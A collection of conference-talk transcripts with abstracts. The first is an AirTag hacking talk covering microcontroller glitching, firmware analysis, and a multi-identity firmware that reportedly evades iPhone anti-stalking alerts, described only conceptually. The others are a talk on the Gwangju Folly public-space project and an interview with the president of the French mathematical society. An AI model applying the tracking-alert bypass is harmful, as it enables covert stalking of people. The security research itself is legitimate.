Alibaba or so, you can get a decent tracker with all of these features, like GPS, GSM, microphone and so on, for $20. So it's even cheaper than an AirTag, and it's not like an AirTag is particularly small or particularly easy to hide. And so what I'm about to show, I don't think is really an issue, because I don't think the AirTags are a great tracking device. But basically, the AirTag has a couple of privacy protections to prevent people from just putting an AirTag in your backpack and being able to track you. If you have an iPhone and an AirTag moves with you for an extended period of time, your iPhone will give you an alert, and so you will get a pop-up saying, hey, an AirTag has been following you, and then you can get that AirTag to play a sound. And from my research, this seems to be based on the ID that is broadcast by the AirTag, which changes regularly. Now, knowing that this ID is generated in the nRF52 code, and knowing that I can modify the original firmware, I wondered: what if we make our AirTag have multiple identities? And so basically, instead of having one identity on my AirTag that would change its ID every, I don't know, 24 hours, what if I have a lot of identities and I basically cycle through them relatively often? The iPhone would think every time that this is a different AirTag, and it wouldn't detect that the AirTag is following me, basically. And so to implement this, I needed to do some further firmware modifications, but for that we first had to actually analyze the firmware. So I started loading the firmware into Ghidra and found that it's really standard nRF52 code.
It uses the normal nRF52 SDK functions, and that is pretty cool, because it allows you to create signatures from the original nRF52 SDK and then apply them to the AirTag firmware, which makes your life much easier: you don't have to reverse engineer everything. Also interesting was that no runtime mitigations or hardening were found, so for example there are no stack canaries and so on, and if you find something like a buffer overflow, it's most probably relatively easy to exploit. Overall the firmware was relatively straightforward to reverse engineer, so the idea of building these privacy-protection bypasses was relatively easy. After a couple of experiments I had my custom firmware ready, and unfortunately it did not trigger any privacy warnings in our testing on iOS 14.5; we tested this with a couple of iPhones and a couple of people walking around. But it also has very limited usability, because managing those identities is kind of difficult: the Find My app only supports 16 AirTags at once, and so on. I also decided not to publish the details of this firmware yet, until this is fixed one way or the other. The reason is that after publishing my first YouTube video about the AirTag hacks, I got a lot of emails like this asking me whether it's possible to bypass the warnings, and a lot of people actually offered me money to bypass those protections. So even though I think the AirTag is not a great tracker, I don't want to be the person who enables people to track others using an AirTag. Another thing a lot of people wanted was changing the sound the AirTag makes when you search for it. Now, sound reverse engineering is kind of fun, because normally when you reverse engineer something in a firmware you need to use IDA Pro, Ghidra, Binary Ninja or Radare or so, but for audio it's really nice to just load it into Audacity, because in most cases the firmware will contain raw sound samples. If you look into the Audacity menu, you can find an option called Import Raw Data, and there you can just experiment with different encodings, byte orders, channels, sample rates and so on. Eventually you might see something like this, and if you look at the center here, that looks a lot like valid audio. And indeed, if we play back just this part in the middle, you can hear that it sounds a lot like the noises the AirTag makes, just a bit shuffled around. It turns out that the audio player is this small sample player, where you have multiple samples that together create one sound. It was a surprisingly large amount of work to reverse engineer it and get it working nicely, but after a while I had this neat setup ready. By the way, at this point, again, thank you to Colin O'Flynn and Leonard, who did a ton of reverse engineering on this and without whom this would not have been possible. So this is the regular sound that the AirTag makes, and here is my AirTag. Now, you might be surprised by the sudden stop of the sound here. This is not just because I clicked stop, but also because the AirTag just crashes at this point. I'm not entirely sure why, but probably the reverse engineering of the sampler was not yet good enough. But hey, we now have an Apple-branded rickrolling device that you can put in somebody's pocket to rickroll them.
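The Audacity trick described above can also be approximated in a few lines of Python: interpret a slice of the firmware dump as PCM samples and write it out as a WAV file so you can listen for valid audio. This is a generic sketch, not the author's tooling; the offset, sample rate and encoding are assumptions you would experiment with, exactly as with the settings in Audacity's raw-import dialog.

```python
# Generic sketch: reinterpret firmware bytes as raw PCM and write a WAV file.
# Offset, sample rate and dtype are guesses to experiment with, just like the
# settings in Audacity's "Import Raw Data" dialog; this is not the author's tool.
import numpy as np
from scipy.io import wavfile

def dump_slice_as_wav(firmware_path, out_path, offset=0, length=None,
                      sample_rate=16_000, dtype="<i2"):
    raw = np.fromfile(firmware_path, dtype=np.uint8)
    raw = raw[offset:offset + length] if length else raw[offset:]
    raw = raw[:len(raw) - (len(raw) % np.dtype(dtype).itemsize)]  # align to sample size
    samples = raw.view(dtype)          # e.g. little-endian signed 16-bit PCM
    wavfile.write(out_path, sample_rate, samples)

# Example: audition a region that looked like audio in the waveform view
# (the file name and offset here are made up for illustration).
# dump_slice_as_wav("airtag_flash.bin", "candidate.wav", offset=0x40000)
```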
And so I hope to release some tools for modifying the firmware to do that soon-ish. Now, another question a lot of people asked me is: can we use the AirTag as a bug? The main idea a lot of people had was that, hey, it has a speaker, right? And a speaker is always also a microphone. Well, on the AirTag, unfortunately, or rather luckily, between the microcontroller and the actual speaker there is an amplifier, and that amplifier has no way to provide feedback to the CPU, so we can't really measure anything that goes on at the speaker. However, what we do have is another tiny device over here, which seems to be a Bosch accelerometer. An accelerometer can measure vibrations, and what is sound if not, you know, vibrations? This is something that is very well known to be possible with accelerometers, but I had never done it, so I thought it would be a fun experiment to try to use the accelerometer as a microphone on the AirTag. Unfortunately, I could not really get a high-speed signal, like, I don't know, a 12-kilohertz accelerometer signal, out of it. It's also a custom part: a lot of websites claim it's a BMA280, but I don't think it's a 100% match; for example, the footprint is different. It seems to be a custom chip, which wouldn't be the first time Bosch has created a custom accelerometer for Apple. Now, the problem is that the accelerometer is not really sensitive to sound, so even if you yell at it, you will only get very slight signals. So I built a very specialized audio chamber for audio-testing the AirTag. This device, which is totally not a regular Pringles can, is my very sophisticated audio chamber for testing the AirTag and using it as a microphone. You put the AirTag at the bottom of the chamber, because that's where especially the deep vibrations will be most significant, and that's needed because we have such a low sample rate that we can only get the low end of the spectrum. After a couple of tries and a ton of post-processing of the signal, this is the sound that I got out of the AirTag. I don't know if you want to call that a success. I personally think the Apple AirTag is not really a great microphone, but I can tell you that I had a ton of fun trying to get this working and trying to use the AirTag and its accelerometer as a mic. Now, last but not least, let's talk about the U1. As mentioned, the U1 was so far only available in higher-end devices such as the Apple Watch and the iPhone, but now it's available for a really cheap, or well, cheap-ish, price. It seems that during pairing the firmware is transferred from the iPhone to the SPI flash of the AirTag, and the U1 firmware is then loaded from there on demand. What's really cool about the AirTag is that you can downgrade it. We have full code execution on the AirTag: you don't need a jailbreak, you don't need an up-to-date iPhone exploit, and no matter what updates come to the AirTag, the fault injection attack is unfixable. We will always be able to inspect what's going on with the U1 on the AirTag, and we can create breakout boards for it and so on. I'm really excited to finally have a cheap way to do U1 and ultra-wideband research in the Apple ultra-wideband ecosystem.
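Stepping back to the accelerometer-as-microphone experiment for a moment: the "ton of post-processing" mentioned there presumably amounts to something like the generic pipeline below (remove the DC offset, band-pass the little bandwidth the low sample rate allows, normalize, write out audio). The sample rate, filter band and file names are assumptions for illustration; the talk does not give the actual processing chain.

```python
# Illustrative post-processing for low-rate accelerometer samples used as audio.
# Sample rate and filter band are assumptions; the talk only says that heavy
# post-processing was needed, not which exact steps were used.
import numpy as np
from scipy.io import wavfile
from scipy.signal import butter, filtfilt, detrend

def accel_to_wav(samples, fs, out_path, low_hz=50.0):
    x = detrend(np.asarray(samples, dtype=np.float64))  # remove DC / slow sensor tilt
    b, a = butter(2, [low_hz / (fs / 2), 0.99], btype="band")
    y = filtfilt(b, a, x)                               # zero-phase band-pass
    y /= np.max(np.abs(y)) + 1e-12                      # normalize to [-1, 1]
    wavfile.write(out_path, int(fs), (y * 32767).astype(np.int16))

# Example with an assumed ~1.6 kHz accelerometer stream:
# accel_to_wav(np.load("accel_z.npy"), fs=1600.0, out_path="airtag_mic.wav")
```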
And if you want to learn more about the U1, check out Jiska and Alexander Heinrich's DEF CON talk this year, which is about the U1. We were also able to create a full layer-by-layer image of the Apple AirTag PCB. David Hulton polished down each layer of the AirTag PCBs and then we reassembled them in image-processing software, and now we have every layer of the PCB. This makes it really easy to trace, for example, the connections to the U1, and it makes life much easier when you just want to sniff a certain line and so on. If you want to learn more about all of these things, the glitcher is open source on my GitHub, the reverse engineering details from Colin O'Flynn are published on his GitHub, and I also have a repository with all the hardware pictures and the high-resolution PCB pictures that let you very easily see what communicates with what and how everything works. I hope you enjoyed this presentation, and if you have any questions or comments, please don't hesitate to contact me on Twitter or via email or whatever. And I hope you enjoyed DEF CON. Thank you.
|
Apple's AirTags enable tracking of personal belongings. They are the most recent and cheapest device interacting with the Apple ecosystem. In contrast to other tracking devices, they feature precise ultra-wideband positioning and leverage almost every other Apple device within the Find My localization network. Less than 10 days after the AirTag release, we bypassed firmware protections by glitching the nRF52 microcontroller. This opens the AirTags for firmware analysis and modification. In this talk, we will explain the initial nRF52 bypass as well as various hacks built on top of it. In particular, AirTags can now act as a phishing device by providing malicious links via the NFC interface, be cloned and appear at a completely different location, be used without the privacy protections that are supposed to alert users to tracking, act as a low-quality microphone by reutilizing the accelerometer, and send arbitrary data via the Find My network. Besides these malicious use cases, AirTags are now a research platform that even allows access to the new ultra-wideband chip U1. REFERENCES: LimitedResults nRF52 APPROTECT Bypass: https://limitedresults.com/2020/06/nrf52-debug-resurrection-approtect-bypass/ Positive Security's Send My research for sending arbitrary data via the Find My network: https://positive.security/blog/send-my Colin O'Flynn's notes on the AirTag Hardware: https://github.com/colinoflynn/airtag-re
|
10.5446/54008 (DOI)
|
Thank you, An-Lin, and thank you, Nicholas, for the introduction and for generously hosting this evening, which for us is a very interesting situation, because we will talk about public space, about a project related to public space in an area very far away from Berlin, in South Korea, and we will try to give some insight into what we did in Gwangju. At the same time, we are launching a book on Gwangju Folly II; you see the book here. I am also very happy to have Markus Weisbeck, the designer, and Sunar Choi, who developed this image together. In a way, what we are trying tonight is a mixture of presentations that give examples of what we think interventions in public space could be today, and, on the other hand, a kind of insight into, or readings from, the book. Of course, some of you might ask what a folly is. It is a slightly obscure word, which refers on the one hand to its etymology, to the French word folie, craziness, foolishness, and which from these origins in the late medieval period led to a number of texts, micro-architectures and artworks, partly related to literature. One of the famous texts, one of the first in which the notion of the folly was introduced, is by Erasmus: The Praise of Folly, a text that basically highlights the intelligence of what other people, or most people, would define as foolish, or as something slightly to the side, or problematic in terms of everyday knowledge. So this book introduced the notion of the folly, which later on had a kind of physical outcome in examples like Bomarzo in Italy in the 16th century, with a very extravagant architecture that also criticized or questioned certain ideas of reason, which was of course a very strong idea in what we circumscribe as the Renaissance. And here is another example, the famous Hameau de la Reine in the park of Versailles, a kind of fake small farm with animals, where the farmers were almost role-played, actually played by actors. So there was a very strong relation to the landscape: the folly was used as a typology, as a physical product, mostly within the context of parks, of the English landscape garden, but also here close to Paris. Then, and I am really rushing through a history which is much more complex, so what I am doing here is probably totally inadequate, the idea of the folly came back in what could be defined as the post-modern discussion in architecture, here with Hans Hollein, and with, I think, a very interesting statement that basically questions ideas of function. So there is a notion of functionlessness in the folly of the post-modern era. We will see, I think, in Felicity Scott's contribution that the story of course has another chapter just before it, with Philip Johnson and some other protagonists of what later became post-modern architecture. The situation of working in Gwangju in South Korea was a very particular one, because the Gwangju Folly project is basically a third format, alongside the Gwangju Biennale and the Gwangju Design Biennale. Both of these biennales happen in a gallery, a really protected environment where the amount of control is almost at its maximum. The idea of this third format, Gwangju Folly, was to work in public space.
And public space in Gwangju is a very loaded case, because some of the origins of the Gwangju Biennale, almost what you could call its founding myth, lie in the Gwangju Uprising of May 18, 1980, which was the beginning of the democratization process in South Korea. It was an uprising started by students and protests, joined by citizens of Gwangju, who took over the city for a couple of weeks before the South Korean army came in, helped, certainly, quite considerably by the CIA. This later became very much a founding myth of democracy in South Korea, but also a very strong element in cultural practice in Gwangju. Today, of course, more than 30 years later, you see this history rather as a history that has been petrified, that has taken the form of memory politics: a monument in a cemetery, or one of the elements I found quite interesting when I first came to Gwangju, an inscription in the pavement of the main street of Gwangju, which is called May 18 Street, defining this street as a UNESCO democracy and human rights street, which is of course, to say the least, a bit absurd. So there is a very strong relation to the idea of activism, of revolt, of risks taken by citizens; on the other hand, what we are witnessing now is a history of memory politics, of something that has solidified and petrified over time. So this was a bit of a starting point, where we thought it would be interesting to use the notion of the folly as a physical product, as an object that would negotiate a field between, certainly, an aesthetic autonomy and, on the other hand, a potential for rupture, for political participation. And this was the invitation to eight different groups of artists, architects and writers: to think about interventions that would reflect that situation, and also the problem of what we call public space. And I think none of us actually knows what public space is, I guess. We will now try to give you a very brief overview. As I said before, we are also launching the book here. The book, of course, is an attempt to contextualize these interventions we did in Gwangju; it tries to read the discussion of the folly, of physical interventions in public space, within a broader context, partly in a very historical way, with texts by Bredekamp and Barry Bergdoll and some other scholars, but also with rather recent examples that investigate the notion of public space. And this is a bit the situation here; you can read it as a kind of inventory of the book. We invited eight different teams. There was a first edition of Gwangju Folly, which was at that time part of the Design Biennale and which focused entirely on architects. What we decided this time was to invite slightly more complex teams, considering also that architects are maybe not really the specialists of public space; there might be others who could make a contribution. So we quite often had, for instance, a combination of an architect and a writer, as in the case of Rem Koolhaas and Ingo Niermann, but also with David Adjaye and Taiye Selasi. Or we invited artist collectives who had a very particular approach to the idea of the public. In a way, we were interested in teams and in people who could, well, this was a hope that we had.
And I think it came across in the end: people who would actually propose questions, which are certainly not answers to what public space is, but who argue, perhaps rather proposing questions and also making a kind of provocative statement, which in that sense also refers to this idea of the folly, which is perhaps rather a rupture with societal norms and less focused on consensus. And I think this is a notion we will hear much more about later, when Eyal speaks: this tension between rupture, revolution and consensus, because this is the field in which we were trying to act. I think, Philipp, you would probably take over from here and explain a bit what our artists, architects and writers did. Yes, all of the invited teams were obviously selected because of their modes of working and their previous history of working, and all of them, or I think all except one, were in Gwangju for the very first time. Maybe for artists, or for some of you as architects, this is a normal mode of operation, but for us this possibility of inviting outside viewpoints, creating a kind of collision between an outside perspective and the very specific history of Gwangju, seemed to allow us to explore this condition of the folly. Nikolaus already talked about rupture, so we consider that as very positive and constructive. And Nikolaus already mentioned this idea of transdisciplinarity, of extending and creating a kind of cross-disciplinary inquiry into public space, as being one of our main curatorial strategies. The second one I would call site-specificity and decontextualization, meaning this inherent property of follies, also looking back in history, of being partly placed in a certain specific context, but partly actually seeking the rupture of that context. A good example is the first folly I want to introduce. I am going to introduce the eight follies very briefly now, and I will have to do this very quickly, so I am spilling all the beans; they are all very complex and exciting projects, but I have to be very brief. Anyway, this first one is by Ai Weiwei. He is picking up on a very specific tradition in Gwangju of pojangmacha, which are food carts or tent wagons serving the residents of Gwangju in public space. They actually played a very specific role in the May 18 demonstrations, serving the demonstrators while they were being besieged by the army. But right now the status of these pojangmacha is in crisis, because there is a policy of cleaning up public space. So these informal economies have a very fragile existence, constantly trying to negotiate with the authorities, and there are actually only two places left in the city where they semi-legally exist. Ai Weiwei picked up on this tradition and began to use the kind of autonomous space that he has when he comes to Gwangju, and designed a contemporary pojangmacha which could not somehow be challenged by the authorities. And here it is.
It was actually manufactured in Beijing, because Ai Weiwei cannot travel to Gwangju, and shipped over to Gwangju, and it is now used by different actors in the city, traveling around and deliberately stepping over the boundaries of the legal zones where pojangmacha are still allowed to exist. I am coming to the next strategy, which I would call useful and useless; again this kind of ambivalence which, we find, characterizes the notion of the folly. Just a little more of the background: the word folly does not translate into Korean, which is a weird situation, but in the end we thought it was a kind of productive misunderstanding, because the city has to pay for these not particularly cheap public space interventions, with its agendas of beautification of public space, whereas we are bringing in, hopefully you agree, a rather different intellectual tradition connected to the folly, talking about ruptures and so on. So these are two completely different understandings, and you can also see this misunderstanding when it comes to use and uselessness: the city was thinking about a particular use and purpose for these follies, whereas many of our protagonists and folly builders were deliberately trying to evade this kind of instrumentalization, creating ruptures rather than simply being useful. This one is a project by David Adjaye and the writer Taiye Selasi, from Ghana, who is currently based in Rome. They collaborated on what they called the Gwangju River Reading Room, a quite large structure creating a new possibility to descend from the embankment walls that frame this central river in Gwangju, taking you down into a kind of wilderness of flatlands which, twice a year during the rainy season, completely floods and buries the bottom part of the structure, executed in concrete, underwater. Taiye Selasi proposed a library to fill these shelves, which will be managed by a local library in Gwangju, so you can use it as a kind of reading space, but you can also do other things there. The third project is by the artist collective Raqs Media Collective from Delhi, who, speaking of site-specificity and decontextualization, interestingly introduced us, as a Delhi artist collective, to the text by Erasmus of Rotterdam, which they had found buried in European history and worked with in Delhi, and now took this concept to Gwangju. I have to explain a tiny bit more: Erasmus of Rotterdam wrote this very important text, In Praise of Folly, which the speaker described as a description, in eight chapters, of a madman on horseback riding through medieval Europe and ranting about the Catholic Church. Somehow, by being disguised, by putting on the mask of a madman, he was able to say things about the Catholic Church in medieval Europe that you would otherwise probably have been beheaded for. So they used this concept, researched corresponding elements in the Korean tradition of satirical theatre, and transformed one of the compartments of the Gwangju underground into a kind of imaginative journey by Erasmus of Rotterdam.
Here you see this transformed compartment, and every now and then there are public performances with masks, relating to the Korean tradition, that speak about the function of satire. Another project, by Do Ho Suh and his brother Eulho, who is an architect, is a kind of mobile hotel which criss-crosses the fabric of Gwangju and finds openings and gaps to slot into, and it can be rented for a night. So it constantly travels and changes location. Here it is on the move. Another project which I think also illustrates this notion of useless and useful is the one by the Danish artist group Superflex. It is part of a series of projects they call Power Toilets; I think this is the third one. It replaces a very run-down, dilapidated toilet, but it does so by recreating, literally, the interior of the toilets of the UNESCO headquarters in Paris. It actually recreates the rather bad 1980s refurbishment of the Marcel Breuer building rather than the original. So here it is: the tiles and the sinks and the urinals were all shipped over, they tried to source the originals, and they provide a very obvious, simple, engaging public function for the citizens, while at the same time making a quite sophisticated commentary on the desperation with which Gwangju lobbies for UNESCO support and builds UNESCO World Heritage into its city branding, et cetera. This is the public toilet in the center of Gwangju; from the outside it is just a simple box. And now I am coming to the fourth curatorial strategy, if I can call it that, which we call participation and agency, and I will use Rem Koolhaas and Ingo Niermann's folly to explain what we mean by that. Nikolaus already told you about this obviously very impressive tradition of citizen revolt that Gwangju stands for. But at the same time it is now a city which is completely depoliticized; there is a sort of fatigue in public space, and you can feel it when you are there. So we asked ourselves what it means to do a project on the political dimension of public space 33 years after this initial revolt, in a city that has so intensely branded this tradition that it was becoming very solid and sterile. And so Rem and Ingo, very simply in a way, moved to this very obvious but very contested field of public participation and proposed a new form of infrastructure for it in public space. It is a very simple infrastructure, which you will see in a second: as a passer-by wandering through the center of the city, you are asked a certain question and you get three different lanes to choose from, depending on whether you want to answer yes, maybe or no. The answers are then recorded on the structure itself, but also in an online archive. Most importantly, the questions are changed every two weeks, and they are formulated by a local NGO. So this was the scheme, and this is how it was realized. This is the very first question that was asked a couple of weeks ago: do you support public plastic surgery? And here you have a woman who obviously does. And I will show you a very quick film about that. Okay, so there it is. I am almost finished. So here you see how it engages with certain communication technologies, and you can also follow the questions.
So we felt it was a very brave thing to simply place such an obvious, simple, almost populist participation device into public space, and since these follies are supposed to be permanent, there is bound to be a very critical situation coming up very soon. And this is the seventh folly, offering certain storage possibilities under the roundabout that was featured in an earlier slide, which was the main site of the demonstrations in public space. And this is the eighth folly, which Eyal Weizman, who collaborated here with Samaneh Moafi, will introduce to you in person later tonight.
|
Nikolaus Hirsch (director), Philipp Misselwitz (co-curator) present their curatorial approach for Gwangju Folly II, which uses the ambiguities of follies as a tool of inquiry to address the many notions of public space. The transformative potential of public space has recently been etched into public consciousness during the uprisings in the streets and squares in many cities around the world.
|
10.5446/54145 (DOI)
|
I am a teacher-researcher in mathematics at the Université de Picardie Jules Verne, and I have been president of the Société Mathématique de France for a short while now, six months, since June 2020. My field of predilection is a kind of mixture of dynamical systems, ergodic theory and theoretical computer science. To put it simply, I work on infinite sequences whose terms belong to a finite set. You can see this as a model that represents quite a few very varied situations. It also gives you the chance to use many different mathematical tools and to work with colleagues who may come from geometry, for instance dynamics defined on surfaces, or colleagues who work on decidability questions, such as deciding isomorphism between dynamical systems, so people from theoretical computer science who work with software. It is a field I enjoy and that I chose when I did my DEA, at the time, that is, my Master 2, in Marseille, because Gérard Rauzy was there, an emblematic figure in the development of this discipline, which was called, and is still called, discrete mathematics; at one point there were even maîtrises in discrete mathematics in France. Now, roughly, there is only pure or applied mathematics, or computer science; it is a label we have somewhat lost, which is a bit of a pity. Before arriving in Marseille I was in Reims, where, on entering university, I had thought of perhaps becoming a sports teacher. But I have to say, and this is something I like to say, that what appealed to me, perhaps even before mathematics, because mathematics I really only discovered at university, was the university itself. I loved university: the fact that you are drowned among 150 students, that they leave you royally in peace, that nobody points a finger at you when you have not handed in your homework, and, strangely, that made me work much, much more. I greatly appreciated the university and its library. That is something I recommend when I talk to pupils who are wondering about their orientation: I keep telling them to go to the library, absolutely everything is there. In most cities it is the largest general science library outside Paris. It is a calm place. I have brought pupils from difficult suburbs like Creil into the library of my university, the Université de Picardie Jules Verne, and they were astounded. It was quite funny: they wondered why there were so many people doing nothing and making no noise. That is what I liked about university: you settle down, you take books, you put them back, you do your exercises. And now that was 30 years ago. I became president of the SMF at the invitation of the previous president, Stéphane Seuret, whom I thank. I was never the class-leader type. I had to think about Stéphane's proposal for quite a while, more than a year, but in a way I could not refuse: when you benefit from an environment, run by someone, that lets you progress in a field you love, mathematics, to sit in your office and so on, with all the working conditions needed to flourish, then when it is your turn to contribute to that, you cannot refuse.
At heart I am a footballer: making passes, scoring a goal. Even when you have scored goals, you also have to know how to make passes, and I see my role as president of the SMF a bit like that. I like collective endeavours. It is my turn, so I will do it with enthusiasm. The SMF is an old lady: in 2022 she will be 150 years old, and we will hold a conference in her honour then, in March 2022. Her missions have evolved, but early on she quickly became a publishing house, and we have collections that we must know how to evolve. Little by little, over, say, the last 30 years, following many initiatives of previous presidents or of colleagues who had these ideas, we have also opened up to the general public, to the world of middle and high school pupils, and to all those people who love mathematics but never wanted to study it. Let me take this opportunity to say that it is a real pity that now, with the new baccalauréat, these people no longer have access to the mathematical sciences in première and terminale. We have lecture series, very many of them, aimed essentially at high school pupils, university students and the general public. More recently, and I am quite pleased about this because I had been a user of these programmes, there is MathC2+, which lets us cover an even wider spectrum, since it is aimed at middle school pupils. So our spectrum of dissemination of mathematics goes from the professional world, with our publications, the Annales scientifiques de l'ENS, the Bulletin de la SMF, and several other book collections such as Astérisque, which are really for us researchers and teacher-researchers, all the way down to middle school. Not yet primary school; I do not know if we will ever do that, but it could be an idea. Within the SMF we also have various commissions, for example the teaching commission, which overlaps a little with this dissemination work, where the SMF reflects on the big reforms, intervenes, approaches the media or is approached by the media for its opinion. We work very closely with the associations of secondary school teachers, which are represented in this commission. There is also someone in charge of human rights. You may know that in 2021 there are several cases of colleagues abroad who are imprisoned: I will mention Azat Miftakhov; a professor at Cairo University whose name I have forgotten, my apologies; and also Tuna Altınel, who has still not got his passport back, although he should be allowed to leave Turkey. We act in concert with the associations that are very vigilant about these people, we circulate the information, and we use new means of communication: Twitter, for example, and we now have a very nice web page on which we post this information. We have a certain number of members, and the SMF is not just its president, its bureau or its board: the members of the SMF can approach us with new initiatives that should be developed. We are going to develop a YouTube channel and put these big lecture series on it so that they are more visible; they were already broadcast, but on channels perhaps less well known to the general public. These objectives are, let us say, a little imprecise, because we are in a phase of reflection.
Personally, as in my university, I liked going out to meet the public very directly, in the collèges of the region. For about 15 years I have given on average some twenty talks a year in collèges and lycées. The SMF has its lecture series, which are also visible on YouTube channels, but that will never replace, and this is very much a current issue, seeing someone in the flesh, someone you can talk to before and afterwards. When I go to collèges and lycées, I ask to eat in the canteen. That is an aspect that is missing, and we are aware of it, if we want a somewhat broader reach. So we try to make our lecture series travel, but perhaps we should consider something else. What I was thinking of is this: across France, and Animath did a survey of this, many colleagues do what I was doing in my university and my region. We all have teaching material, talks, outreach material and so on; perhaps we should think about pooling it. That is what we do at our university: when I was director of my unit I created a maths-for-the-general-public team, as now exists in quite a few universities. What we did was collect the talks of the various colleagues, along with a script, since a talk fits in the slot between two classes, so 50 minutes, so that it can be shared among colleagues, because otherwise it is always the same people who are asked. I had a talk on magic tricks that my colleagues now give; a colleague, Karine Sorlin, had made one on cryptography, explained it to us and gave us all the material, and now several of us can deliver it. Doing that on a larger scale is something I am thinking about, because it would perhaps let us spread all these initiatives even better, since often those who benefit are those near the big cities, and sometimes colleagues have no idea what talk to give. That is one of the things. We also notice that usually the cycle Un texte, un mathématicien, which the SMF has been running for a very long time, takes place at the Bibliothèque nationale de France, and our officer Gérard Musi, who looks after it, tells me that it is essentially Parisian lycées that attend, often the same ones, which is great, and a pity. I would really like pupils from, I don't know, lycées much further away to be able to come; they can take a bus, and so on. But we can also make these talks travel, which is what happens. And now, with Zoom and all the tools we have developed, we are thinking about doing talks in a sort of live-television mode. But in that case you need, as you have here, a director, so it requires a certain investment, in people and in equipment. So we are reflecting together with Animath, who have the same kind of needs, on evolving towards a model that would allow us to broadcast: we would go from 300 spectators to perhaps 2,000 or 3,000, live, which would be great.
Of course, the human interaction will always be missing. This week I am at a hybrid conference and it is complicated. But we would go from 300 to perhaps 2,000, and that is not nothing, and we could reach collèges and lycées that are hard to get to. To give an example, in my region you sometimes have to drive 150 km with no motorway; here in Marseille, if you want to give a talk in Digne, it is a long way: a one-hour talk means a full day of travel. So I always have that in mind; that is one of the projects. The other projects are on the editorial side: we need to sell more books, which is the somewhat commercial aspect, but I think the SMF has an obvious deficit of visibility compared with publishers like Springer, though those are war machines. So we have to rethink our dissemination. I am thinking of Cours Spécialisés: we should be more proactive in finding good books accessible to our M2 students, PhD students, young researchers and beyond. We are thinking about this with Frédéric Bayard, who works with me at the SMF on the publishing side, and also thinking about economic models that would allow us to move towards open science. Ultimately, open science would like everything to be free, but we do have employees, and everything being free is frightening, because it means no more income, and therefore nobody left at the SMF. So we need to find an economic model that brings us closer to such a model, and I understand the aspiration: I am the first to want the research our researchers produce to be available to the whole French public, since I am paid by the French state, and it is a shame that we have to pay subscriptions to access what we ourselves produce. It is a bit incredible, but that is how it is. So I am very sensitive to this model, but now that I am president... it is one thing to be a teacher-researcher and say that everything should be free, and another to be in a position of responsibility and realise that all of this has a cost and that we must not do anything foolish, because the SMF is 150 years old and I do not want it to close its doors after me. So it is not simple, opinions diverge a great deal, we are thinking about it seriously, and I prefer not to say what we have in mind, because it will probably not happen, or it will take another form, but in any case, with Frédéric Bayard in particular, the bureau and the board, these are recurring subjects of discussion. Like many organisations, we have a bureau and a board of directors. The board is elected and partially renewed each year: we are 24, and every year 8 members are elected, and then within the board we choose a bureau. Roughly speaking, the bureau deals with day-to-day business, and the board rather with the big financial questions, and also with all those public positions where we need the opinion of the 24 representatives: yes, we agree for the SMF to sign this letter, to produce this document, to be sent to this or that place. I must thank my bureau and my board, by the way, because I am very well surrounded, and it matters to choose well, or to...
yes, because we approach people and ask them to stand for election, so it matters to have people you can count on, and the bureau I chose is wonderful. Another message I can pass on is that the SMF is not only the president, the bureau, the board and the staff, who are wonderful as well, with people in Marseille and in Paris at the IHP; it is also all the members, and even people beyond the members. If a member or anyone else has an initiative they want to develop, do not hesitate to put the idea to us, because we are interested. We are only a representation of part of the community; even thematically, in terms of sensibilities, we do not represent all of you, dear colleagues. So we really do listen; some people know this and approach us, especially on human rights. One initiative, in 2020 for example, though it had already been put in place under Stéphane Seuret, concerns doctoral students who are agrégés, who are doing or have finished a thesis and who ask their rectorat for a secondment, and sometimes do not get it. This year, for example, 19 of them did not get one. In that case an appeal can be made, and we let it be known that the SMF could support their requests; of the 19, 18 in the end had their appeal accepted, so they could go on to a postdoc or continue their thesis in good conditions. For one of them the appeal was refused, but fortunately the SMF can still intervene, going higher, above the rectorat, and it is going to work. People should know that we do a lot for teaching, for collège and lycée; we work with teachers in collège, lycée and classes préparatoires, and for our young PhDs. Another initiative, set up by INSMI, now that I think of it, is the R2M network, which allows people who still want to do mathematics, who have a doctorate but who are, for example, in industry or teaching in a lycée, to be attached to a laboratory as an associate researcher. The R2M network, the SMF and INSMI try to encourage this attachment so that these people keep contact with the research world; in general they receive no money from the laboratory, but for us it can be an asset, in the sense that we keep contact with industry. That is not easy to arrange in laboratories in general, and if this network can contribute to it, I think it will benefit us when we put together our Master 2 programmes and look for professionals on certain topics: already having contacts, thanks to these associate researchers and this R2M network, makes setting up the programme considerably easier. In France we are also in contact, and this is quite recent, developed by my predecessor Stéphane Seuret, with an association of learned societies that is currently being formed, which is very topical with the LPR. Letters have been put together through this association, which for the moment goes under a provisional name, and on certain texts they gathered 80 signatures from learned societies, ranging from sport, and I don't know what else, to Germanic languages, physics, biology, and so on.
So that gives us more weight, because an unfortunate observation made by Stéphane Seuret, my predecessor, is that he worked a great deal, with Louise Nyssen, who was our officer in charge at the time, on the lycée reform, for or against it; in any case they were constructive rather than reactionary, they proposed avenues, solutions and our criticisms, and the result was nil, for a great deal of energy and thought. So the idea here is, rather than acting alone, to try to work with other learned societies, because then it is no longer only the 2,000 members of the SMF; we start talking about tens of thousands of researchers. It sometimes means not demanding exactly what we would like, because a consensus is needed to co-sign a letter all together, and that is not a simple exercise; but for now, it has to be said, the LPR united researchers against it so strongly that it was fairly easy to sign all together. So this is being built right now; this afternoon I have to read my emails about the constitution of this new assembly, and we hope to carry more weight. But unfortunately, once again, for the LPR it was a great deal of energy for a nil result. So we must summon up our courage and carry on. And as I explained earlier, the SMF's vocation is to disseminate the mathematical sciences, and the CIRM contributes to that; everyone knows it is the largest conference centre for mathematics in the world. As a student at Luminy, when I did my thesis, I was able to benefit from it, and it is an absolutely incredible place, it must be said, starting with its library and its whole programme, which unfortunately in 2020 was cut by about three quarters. So we act in concert with the current director, Pascal Hubert, and previously with Patrick Foulon, through regular discussions, several times a month, on various subjects. What I regret a little, arriving at the SMF, and as a researcher I was perhaps not sufficiently aware of it myself before, is how little known the work carried out by the SMF through the CIRM is, for the benefit of all colleagues, and of INSMI too, and of Aix-Marseille Université. Because often, and I speak for myself, when you come here you have the impression that it simply exists, so you benefit from it, and that is normal; the stays are, for a good part, free, so it feels free. Well, no: when you attend your first board meeting, where the auditor speaks and presents the figures, you realise that behind it all there is necessarily a great deal of work, since the CIRM's budget is absolutely colossal, from memory between 4 and 5 million euros a year, for between 4,000 and 5,000 speakers and participants, which means costs of around 900 euros per participant. And as you know, the fee charged to colleagues, when they pay it, is 525 euros I believe, so 400 euros are missing. Which means that the CIRM, INSMI and the SMF are behind the scenes, going out to find subsidies, making it work, optimising expenses, and so on.
